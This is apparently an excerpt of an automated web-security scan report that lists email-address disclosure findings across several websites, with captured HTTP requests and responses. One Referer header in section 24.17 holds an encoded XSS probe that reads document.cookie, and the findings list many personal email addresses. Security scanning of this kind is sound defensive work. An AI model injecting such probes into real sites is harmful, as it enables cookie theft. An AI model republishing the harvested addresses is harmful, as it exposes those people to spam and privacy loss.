Date: Tue, 25 Jan 2011 02:08:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 02 May 2008 19:53:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Content-Type: application/x-javascript
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 22461

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="deparenthood"
var s=s_gi(s_account)
/******************
...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...

24.7. http://blog.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.tweetmeme.com
Path:	/

Issue detail

The following email address was disclosed in the response:

kate@tweetmeme.com

Request

Response

24.8. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.cloudscan.us
Path:	/examples/html/sql-injection-xss-cross-site-scripting-dork.html

Issue detail

The following email addresses were disclosed in the response:

aldous.gc@wanadoo.fr
bill@farryachtsales.com
ed@sailinganarchy.com
editor@sailinganarchy.com
erik@bosrup.com
helpdesk@example.com
info@BicSportNA.com
info@sailinganarchy.com
klaus.hartl@stilbuero.de
krista@trippdesign.net
luiz@intercreate.com
markracine@gmail.com
sales@cstcomposites.com
sam@conio.net
scot@sailinganarchy.com
support@yachtscoring.com
webmaster@EchoChrist.com
www.stcroixyc@gmail.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 25 Jan 2011 00:57:12 GMT
Accept-Ranges: bytes
ETag: "ac6a35cd2abccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 00:57:16 GMT
Content-Length: 1525922

<html><head><title>SQL Injection, DORK, XSS, XPath Injection, CWE-79, CWE-89</title>
<meta name="description" content="XSS, Cross Site Scripting, XPath Injection, SQL Injection, DORK, CWE-79, CAPEC-8
...[SNIP]...
EXT">You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).</span>
...[SNIP]...
<li>klaus.hartl@stilbuero.de</li>
...[SNIP]...
<span class="HIGHLIGHT">klaus.hartl@stilbuero.de</span>
...[SNIP]...
<span class="HIGHLIGHT">klaus.hartl@stilbuero.de</span>
...[SNIP]...
<li>erik@bosrup.com</li>
...[SNIP]...
<span class="HIGHLIGHT">erik@bosrup.com</span>
...[SNIP]...
<li>klaus.hartl@stilbuero.de</li>
...[SNIP]...
<span class="HIGHLIGHT">klaus.hartl@stilbuero.de</span>
...[SNIP]...
<span class="HIGHLIGHT">klaus.hartl@stilbuero.de</span>
...[SNIP]...
<li>erik@bosrup.com</li>
...[SNIP]...
<span class="HIGHLIGHT">erik@bosrup.com</span>
...[SNIP]...
<li>aldous.gc@wanadoo.fr</li>
...[SNIP]...
<span class="HIGHLIGHT">aldous.gc@wanadoo.fr</span>
...[SNIP]...
<li>sam@conio.net</li>
...[SNIP]...
<span class="HIGHLIGHT">sam@conio.net</span>
...[SNIP]...
<li>scot@sailinganarchy.com</li>
...[SNIP]...
<span class="HIGHLIGHT">scot@sailinganarchy.com</span>
...[SNIP]...
<li>support@yachtscoring.com</li><li>www.stcroixyc@gmail.com</li>
...[SNIP]...
<span class="HIGHLIGHT">www.stcroixyc@gmail.com</span>
...[SNIP]...
<span class="HIGHLIGHT">support@yachtscoring.com</span>
...[SNIP]...
<li>editor@sailinganarchy.com</li>
...[SNIP]...
<span class="HIGHLIGHT">editor@sailinganarchy.com</span>
...[SNIP]...
<li>bill@farryachtsales.com</li>
...[SNIP]...
<li>editor@sailinganarchy.com</li><li>info@BicSportNA.com</li><li>krista@trippdesign.net</li><li>sales@cstcomposites.com</li>
...[SNIP]...
<span class="HIGHLIGHT">info@BicSportNA.com</span>"><span class="HIGHLIGHT">info@BicSportNA.com</span>
...[SNIP]...
<span class="HIGHLIGHT">editor@sailinganarchy.com</span>
...[SNIP]...
<span class="HIGHLIGHT">krista@trippdesign.net</span>
...[SNIP]...
<span class="HIGHLIGHT">sales@cstcomposites.com</span>"><span class="HIGHLIGHT">sales@cstcomposites.com</span>
...[SNIP]...
<span class="HIGHLIGHT">bill@farryachtsales.com</span>
...[SNIP]...
<li>editor@sailinganarchy.com</li>
...[SNIP]...
<span class="HIGHLIGHT">editor@sailinganarchy.com</span>
...[SNIP]...
<li>markracine@gmail.com</li>
...[SNIP]...
<span class="HIGHLIGHT">markracine@gmail.com</span>
...[SNIP]...
<span class="HIGHLIGHT">markracine@gmail.com</span>
...[SNIP]...
<li>webmaster@EchoChrist.com</li>
...[SNIP]...
<span class="HIGHLIGHT">webmaster@EchoChrist.com</span>
...[SNIP]...
<li>ed@sailinganarchy.com</li><li>info@sailinganarchy.com</li>
...[SNIP]...
<span class="HIGHLIGHT">info@sailinganarchy.com</span>
...[SNIP]...
<span class="HIGHLIGHT">ed@sailinganarchy.com</span>
...[SNIP]...
<li>luiz@intercreate.com</li>
...[SNIP]...
<span class="HIGHLIGHT">luiz@intercreate.com</span>
...[SNIP]...

24.9. http://cdn.statics.live.spongecell.com/ups/v3m/lib/en/resources.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.statics.live.spongecell.com
Path:	/ups/v3m/lib/en/resources.xml

Issue detail

The following email address was disclosed in the response:

adbox@spongecell.com

Request

GET /ups/v3m/lib/en/resources.xml HTTP/1.1
Host: cdn.statics.live.spongecell.com
Proxy-Connection: keep-alive
Referer: http://cdn.statics.live.spongecell.com/ups/v3m/bin/RectangleGrid.swf?placementId=&flightId=&clickthroughUrl=http%3A%2F%2Fbs.serving-sys.com%2FBurstingPipe%2FadServer.bs%3Fcn%3Dtf%26c%3D20%26mc%3Dclick%26pli%3D2150004%26PluID%3D0%26ord%3D%5Btimestamp%5D&actionsType=Rectangle&backupImageUrl=http%3A%2F%2Fcdn.statics.live.spongecell.com%2Fups%2Fv3m%2Fassets%2F300x250.jpg&hostBaseUrl=spongecell.com&creativeSwfUrl=..%2Fassets%2F300x250.swf&subMenuType=Pop&menuType=Grid&height=250&trackingPixel=http%3A%2F%2Fbs.serving-sys.com%2FBurstingPipe%2FadServer.bs%3Fcn%3Dtf%26c%3D19%26mc%3Dimp%26pli%3D2150004%26PluID%3D0%26ord%3D%5Btimestamp%5D%26rtu%3D-1&widgetId=264001&trackImpressions=0&width=300&linkPrefixDecoded=SPONGECELL_CLICK_TAG&clickTag=http%3A//bs.serving-sys.com/BurstingPipe/adServer.bs%3Fcn%3Dtf%26c%3D20%26mc%3Dclick%26pli%3D2150004%26PluID%3D0%26ord%3D%5Btimestamp%5D&clickTag1=http%3A//www.facebook.com/%23%21/ups&clickTag2=http%3A//twitter.com/ups&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: tKThkNzaXdFEi9ZbXvmjV3P76LMHvrCE18ULH1xhAjDyzXQd1sv7YgzeNIP4TmGa
x-amz-request-id: ABFB62588C360383
x-amz-meta-s3fox-filesize: 15922
x-amz-meta-s3fox-modifiedtime: 1292954348000
Accept-Ranges: bytes
Content-Type: text/xml
Server: AmazonS3
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 22:21:04 GMT
Last-Modified: Tue, 21 Dec 2010 17:59:22 GMT
Connection: keep-alive
Content-Length: 15922

<?xml version="1.0" encoding="utf-8"?>
<resources>
<screens>
<default>
<info><eventInfo><![CDATA[<p>[event title]<br/>[event when]</p>]]></eventInfo></info>
<missingURL>http://d
...[SNIP]...
<field name="trackingMessage" recipients="adbox@spongecell.com" subject="Spongecell Form Submission - [ad id]" template="Blank"/>
...[SNIP]...

24.10. http://code.google.com/p/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/

Issue detail

The following email address was disclosed in the response:

TenSafeF...@gmail.com

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.11. http://community.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/

Issue detail

The following email address was disclosed in the response:

jugcalendar@opensourcematters.org

Request

Response

24.12. http://community.joomla.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/index.php

Issue detail

The following email address was disclosed in the response:

jugcalendar@opensourcematters.org

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<a href="http://www.google.com/calendar/embed?src=jugcalendar@opensourcematters.org" target="_blank">
...[SNIP]...

24.13. http://community.parenthood.com/feed/get/type/rss/source/domain/id/40337 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.parenthood.com
Path:	/feed/get/type/rss/source/domain/id/40337

Issue detail

The following email addresses were disclosed in the response:

feeds@kickapps.com
webmaster@kickapps.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: YUKUSESSID=nfe3mp9eu1on73emvsu6v31et7; expires=Tue, 08 Feb 2011 02:23:05 GMT; path=/; domain=community.parenthood.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 13:28:38 GMT
ETag: "a525764423c1a7805bf59a00d8bf4c7c"
Content-Disposition: inline; filename=rss-feed.rss
Vary: Accept-Encoding
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: application/xml;charset=utf-8
Content-Length: 19977

<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/css" href="/feed/bypass/styles/feed.css" media="screen"?>
<?xml-stylesheet type="text/xsl" href="/feed/bypass/styles/feed.xsl"?>
<rss
...[SNIP]...
<managingEditor>feeds@kickapps.com (FeedMaster)</managingEditor>
...[SNIP]...
<webMaster>webmaster@kickapps.com (WebMaster)</webMaster>
...[SNIP]...
<author>feeds@kickapps.com (naners123)</author>
...[SNIP]...
<author>feeds@kickapps.com (Elizabeth)</author>
...[SNIP]...
<author>feeds@kickapps.com (DRaudy17)</author>
...[SNIP]...
<author>feeds@kickapps.com (Whats New)</author>
...[SNIP]...
<author>feeds@kickapps.com (DRaudy17)</author>
...[SNIP]...
<author>feeds@kickapps.com (DRaudy17)</author>
...[SNIP]...
<author>feeds@kickapps.com (support)</author>
...[SNIP]...
<author>feeds@kickapps.com (support)</author>
...[SNIP]...
<author>feeds@kickapps.com (lizspicer)</author>
...[SNIP]...
<author>feeds@kickapps.com (RyanDJ)</author>
...[SNIP]...
<author>feeds@kickapps.com (engineermom21)</author>
...[SNIP]...
<author>feeds@kickapps.com (dana2010)</author>
...[SNIP]...
<author>feeds@kickapps.com (Cone50)</author>
...[SNIP]...
<author>feeds@kickapps.com (natasha9211)</author>
...[SNIP]...
<author>feeds@kickapps.com (NewMommy2010)</author>
...[SNIP]...
<author>feeds@kickapps.com (babs1402)</author>
...[SNIP]...
<author>feeds@kickapps.com (babs1402)</author>
...[SNIP]...
<author>feeds@kickapps.com (sunnysideup01)</author>
...[SNIP]...
<author>feeds@kickapps.com (DRaudy17)</author>
...[SNIP]...
<author>feeds@kickapps.com (engineermom21)</author>
...[SNIP]...

24.14. http://community.parenthood.com/service/searchEverythingAsRss.kickAction previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.parenthood.com
Path:	/service/searchEverythingAsRss.kickAction

Issue detail

The following email address was disclosed in the response:

boards@parenthood.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:22:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 02:22:48 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/xml;charset=UTF-8
Content-Length: 140035

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:apple-wallpapers="http://www.apple.com/
...[SNIP]...
<managingEditor>boards@parenthood.com (Parenthood)</managingEditor>
...[SNIP]...
<webMaster>boards@parenthood.com (Parenthood)</webMaster>
...[SNIP]...

24.15. http://demo.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo.joomla.org
Path:	/

Issue detail

The following email address was disclosed in the response:

demosupport@cloudaccess.net

Request

Response

24.16. http://demo.joomla.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo.joomla.org
Path:	/index.php

Issue detail

The following email addresses were disclosed in the response:

demosupport@cloudaccess.net
dom@cloudaccess.net

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:25:11 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 02:25:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 8770

<?xml version="1.0" encoding="utf-8"?>

<?xml-stylesheet href="/plugins/system/jceutilities/css/jceutilities.css?v=224" type="text/css"
...[SNIP]...
<a href="mailto:demosupport@cloudaccess.net">demosupport@cloudaccess.net</a>
...[SNIP]...
<author>dom@cloudaccess.net (Administrator)</author>
...[SNIP]...

24.17. http://developer.joomla.org/media/system/js/mootools-more.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/media/system/js/mootools-more.js

Issue detail

The following email addresses were disclosed in the response:

erik@domain.com
espen@domene.no
fred@domain.com
fred@domain.hu
fred@domaine.com
fred@domein.nl
fred@dominio.com
jan@domena.pl
maria@bernasconi.ch
matti@meikalainen.com
max@mustermann.de
name@domain.com
nome@dominio.com

Request

GET /media/system/js/mootools-more.js HTTP/1.1
Host: developer.joomla.org
Proxy-Connection: keep-alive
Referer: http://developer.joomla.org/security/news.html?dce01%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e865402a94b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utma=228838275.529671353.1295835725.1295835725.1295835725.1; __utmc=228838275; 39f24a85b5d169a21046edfe6eaa5320=5ad2cfaafece06e83d5d1454ed554fa9

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:06:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
Last-Modified: Mon, 10 Jan 2011 19:52:34 GMT
ETag: "62cf68-36c85-499834f1e6480"
Accept-Ranges: bytes
Content-Length: 224389
Content-Type: application/javascript

MooTools.More={version:"1.3.0.1",build:"6dce99bed2792dffcbbbb4ddc15a1fb9a41994b5"};Events.Pseudos=function(f,c,d){var b="monitorEvents:";var a=function(g){return{store:g.store?function(h,i){g.store(b+
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...
na data valida com {date}",dateInFormatMDY:'Per favor introdueix una data valida com DD/MM/YYYY (p.e. "31/12/1999")',email:'Per favor, introdueix una adre..a de correu electronic valida. Per exemple, "fred@domain.com".',url:"Per favor introdueix una URL valida com http://www.google.com.",currencyDollar:"Per favor introdueix una quantitat valida de .... Per exemple ...100,00 .",oneRequired:"Per favor introdueix alg
...[SNIP]...
SuchAs:"Zadejte pros..m platn.. datum jako {date}",dateInFormatMDY:'Zadejte pros..m platn.. datum jako MM / DD / RRRR (tj. "12/31/1999")',email:'Zadejte pros..m platnou e-mailovou adresu. Nap....klad "fred@domain.com".',url:"Zadejte pros..m platnou URL adresu jako http://www.google.com.",currencyDollar:"Zadejte pros..m platnou ....stku. Nap....klad $100.00.",oneRequired:"Zadejte pros..m alespo.. jednu hodnotu pro
...[SNIP]...
mrum og andre tegn er ikke tilladt.",dateSuchAs:"Skriv en gyldig dato som {date}",dateInFormatMDY:'Skriv dato i formatet DD-MM-YYYY (f.eks. "31-12-1999")',email:'Skriv en gyldig e-mail adresse. F.eks "fred@domain.com".',url:'Skriv en gyldig URL adresse. F.eks "http://www.google.com".',currencyDollar:"Skriv et gldigt bel..b. F.eks Kr.100.00 .",oneRequired:"Et eller flere af felterne i denne formular skal udfyldes."
...[SNIP]...
InFormatMDY:"Geben Sie bitte ein gültiges Datum ein. Wie zum Beispiel TT.MM.JJJJ (z.B. "31.12.1999")",email:"Geben Sie bitte eine gültige E-Mail Adresse ein. Wie zum Beispiel "maria@bernasconi.ch".",url:"Geben Sie bitte eine gültige URL ein. Wie zum Beispiel http://www.google.ch.",currencyDollar:"Geben Sie bitte einen gültigen Betrag in Schweizer Franken ein. Wie zum Beispiel 10
...[SNIP]...
date}").",dateInFormatMDY:"Geben Sie bitte ein gültiges Datum im Format TT.MM.JJJJ ein (z.B. "31.12.1999").",email:"Geben Sie bitte eine gültige E-Mail-Adresse ein (z.B. "max@mustermann.de").",url:"Geben Sie bitte eine gültige URL ein (z.B. "http://www.google.de").",currencyDollar:"Geben Sie bitte einen gültigen Betrag in EURO ein (z.B. 100.00€).",oneRequi
...[SNIP]...
.lida como {date}",dateInFormatMDY:'Por favor ingrese una fecha v..lida, utulizando el formato DD/MM/YYYY (p.e. "31/12/1999")',email:'Por favor, ingrese una direcci..n de e-mail v..lida. Por ejemplo, "fred@dominio.com".',url:"Por favor ingrese una URL v..lida como http://www.google.com.",currencyDollar:"Por favor ingrese una cantidad v..lida de pesos. Por ejemplo $100,00 .",oneRequired:"Por favor ingrese algo para
...[SNIP]...
da como {date}",dateInFormatMDY:'Por favor introduce una fecha válida como DD/MM/YYYY (p.e. "31/12/1999")',email:'Por favor, introduce una dirección de email válida. Por ejemplo, "fred@domain.com".',url:"Por favor introduce una URL válida como http://www.google.com.",currencyDollar:"Por favor introduce una cantidad válida de .... Por ejemplo ...100,00 .",oneRequired:"Por favor in
...[SNIP]...
As:"Palun sisestage kehtiv kuup..ev kujul {date}",dateInFormatMDY:'Palun sisestage kehtiv kuup..ev kujul MM.DD.YYYY (n..iteks: "12.31.1999").',email:'Palun sisestage kehtiv e-maili aadress (n..iteks: "fred@domain.com").',url:"Palun sisestage kehtiv URL (n..iteks: http://www.google.com).",currencyDollar:"Palun sisestage kehtiv $ summa (n..iteks: $100.00).",oneRequired:"Palun sisestage midagi v..hemalt ..hele antud
...[SNIP]...
tMDY:'........ .... .......... .......... .... ...... MM/DD/YYYY ........ ........ (.......... "12/31/1999").',email:'........ .... ........ .......... .......... ........ ......... ........ ........ "fred@domain.com".',url:"........ .... URL .......... .......... http://www.google.com ........ .........",currencyDollar:"........ .... ............ .......... ........ ...... ...... ........ ........ .......... 100.
...[SNIP]...
esimerkiksi {date}",dateInFormatMDY:'Ole hyv.. ja anna kelvollinen p..iv..m....r.. muodossa pp/kk/vvvv (kuten "12/31/1999")',email:'Ole hyv.. ja anna kelvollinen s..hk..postiosoite (kuten esimerkiksi "matti@meikalainen.com").',url:"Ole hyv.. ja anna kelvollinen URL, kuten esimerkiksi http://www.google.fi.",currencyDollar:"Ole hyv.. ja anna kelvollinen eurosumma (kuten esimerkiksi 100,00 EUR) .",oneRequired:"Ole hyv.. ja
...[SNIP]...
e correcte comme {date}",dateInFormatMDY:'Veuillez saisir une date correcte, au format JJ/MM/AAAA (ex : "31/11/1999").',email:'Veuillez saisir une adresse de courrier électronique. Par example "fred@domaine.com".',url:"Veuillez saisir une URL, comme http://www.google.com.",currencyDollar:"Veuillez saisir une quantité correcte. Par example 100,00€.",oneRequired:"Veuillez sélectionner au moi
...[SNIP]...
. ........, ...... {date}",dateInFormatMDY:'.... .......... .......... ........ ............ MM/DD/YYYY (...... "12/31/1999")',email:'.... .......... .......... ............ ........... ............: "fred@domain.com".',url:".... .......... .......... ...... .........., ...... http://www.google.com.",currencyDollar:".... .......... ........ .......... ......... ............ $100.00.",oneRequired:".... .......... .
...[SNIP]...
s d..tum megad..sa sz..ks..ges (pl. {date}).",dateInFormatMDY:'Val..s d..tum megad..sa sz..ks..ges .........HH.NN. form..ban. (pl. "1999.12.31.")',email:'Val..s e-mail c..m megad..sa sz..ks..ges (pl. "fred@domain.hu").',url:"Val..s URL megad..sa sz..ks..ges (pl. http://www.google.com).",currencyDollar:"Val..s p..nz..sszeg megad..sa sz..ks..ges (pl. 100.00 Ft.).",oneRequired:"Az al..bbi mez..k legal..bb egyik..nek
...[SNIP]...
ri.",dateSuchAs:"Inserire una data valida del tipo {date}",dateInFormatMDY:'Inserire una data valida nel formato MM/GG/AAAA (es.: "12/31/1999")',email:'Inserire un indirizzo email valido. Per esempio "nome@dominio.com".',url:'Inserire un indirizzo valido. Per esempio "http://www.dominio.com".',currencyDollar:'Inserire un importo valido. Per esempio "$100.00".',oneRequired:"Completare almeno uno dei campi richiesti.
...[SNIP]...
",dateSuchAs:"Vul een geldige datum in, zoals {date}",dateInFormatMDY:'Vul een geldige datum, in het formaat MM/DD/YYYY (bijvoorbeeld "12/31/1999")',email:'Vul een geldig e-mailadres in. Bijvoorbeeld "fred@domein.nl".',url:"Vul een geldige URL in, zoals http://www.google.nl.",currencyDollar:"Vul een geldig $ bedrag in. Bijvoorbeeld $100.00 .",oneRequired:"Vul iets in bij in ieder geval een van deze velden.",warni
...[SNIP]...
nn en gyldig dato, som {date}",dateInFormatMDY:'Vennligst skriv inn en gyldig dato, i formatet MM/DD/YYYY (for eksempel "12/31/1999")',email:'Vennligst skriv inn en gyldig epost-adresse. For eksempel "espen@domene.no".',url:"Vennligst skriv inn en gyldig URL, for eksempel http://www.google.no.",currencyDollar:"Vennligst fyll ut et gyldig $ bel....p. For eksempel $100.00 .",oneRequired:"Vennligst fyll ut noe i mins
...[SNIP]...
As:"Prosimy poda.. prawid..ow.. dat.. w formacie: {date}",dateInFormatMDY:'Prosimy poda.. poprawn.. date w formacie DD.MM.RRRR (i.e. "12.01.2009")',email:'Prosimy poda.. prawid..owy adres e-mail, np. "jan@domena.pl".',url:"Prosimy poda.. prawid..owy adres URL, np. http://www.google.pl.",currencyDollar:"Prosimy poda.. prawid..ow.. sum.. w PLN. Dla przyk..adu: 100.00 PLN.",oneRequired:"Prosimy wype..ni.. chocia..
...[SNIP]...
dos.",dateSuchAs:"Digite uma data v..lida, como {date}",dateInFormatMDY:'Digite uma data v..lida, como DD/MM/YYYY (por exemplo, "31/12/1999")',email:'Digite um endere..o de email v..lido. Por exemplo "nome@dominio.com".',url:"Digite uma URL v..lida. Exemplo: http://www.google.com.",currencyDollar:"Digite um valor em dinheiro v..lido. Exemplo: R$100,00 .",oneRequired:"Digite algo para pelo menos um desses campos.",e
...[SNIP]...
permitidos.",dateSuchAs:"Digite uma data v..lida, como {date}",dateInFormatMDY:'Digite uma data v..lida, como DD/MM/YYYY (p.ex. "31/12/1999")',email:'Digite um endere..o de email v..lido. Por exemplo "fred@domain.com".',url:"Digite uma URL v..lida, como http://www.google.com.",currencyDollar:"Digite um valor v..lido $. Por exemplo $ 100,00. ",oneRequired:"Digite algo para pelo menos um desses insumos.",errorPrefix
...[SNIP]...
.......... ........ .. .............. ..../..../........ (................ "12/31/1999")',email:'...................., .............. .................... ..........-........... ...... .............. "fred@domain.com".',url:"...................., .............. .................... ............ ........ http://www.google.com.",currencyDollar:"...................., .............. .......... .. ................. ...
...[SNIP]...
.",dateSuchAs:"Prosim, vnesite pravilen datum kot {date}",dateInFormatMDY:'Prosim, vnesite pravilen datum kot MM.DD.YYYY (primer "12.31.1999")',email:'Prosim, vnesite pravilen email naslov. Na primer "fred@domain.com".',url:"Prosim, vnesite pravilen URL kot http://www.google.com.",currencyDollar:"Prosim, vnesit epravilno vrednost .... Primer 100,00... .",oneRequired:"Prosimo, vnesite nekaj za vsaj eno izmed teh po
...[SNIP]...
..r till..tna.",dateSuchAs:"Ange ett giltigt datum som t.ex. {date}",dateInFormatMDY:'Ange ett giltigt datum som t.ex. YYYY-MM-DD (i.e. "1999-12-31")',email:'Ange en giltig e-postadress. Till exempel "erik@domain.com".',url:"Ange en giltig webbadress som http://www.google.com.",currencyDollar:"Ange en giltig belopp. Exempelvis 100,00.",oneRequired:"V..nligen ange minst ett av dessa alternativ.",errorPrefix:"Fel: "
...[SNIP]...
........... ........ .. .............. ..../..../........ (.................. "12/31/2009").',email:'.............. ................ ............ ...................... .......... (.................. "name@domain.com").',url:".............. ................ ................-.................. (.................. http://www.google.com).",currencyDollar:'.............. ........ .. .............. (..................
...[SNIP]...
chAs:".......................................{date}...",dateInFormatMDY:'..........................................YYYY-MM-DD ("2010-12-31")...',email:'................................................"fred@domain.com"...',url:".................. Url ..................http://www.google.com...",currencyDollar:".............................................100.0",oneRequired:"........................",errorPrefix:"...
...[SNIP]...
As:".......................................{date}... ",dateInFormatMDY:'..........................................YYYY-MM-DD ("2010-12-31")... ',email:'................................................"fred@domain.com"... ',url:"..................Url ..................http://www.google.com... ",currencyDollar:".............................................100.0",oneRequired:"........................ ",errorPrefix:".
...[SNIP]...

24.18. http://dir.filewatcher.com/d/FreeBSD/6-stable/amd64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/6-stable/amd64.0.0.htm

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/FreeBSD/6-stable/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 197
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

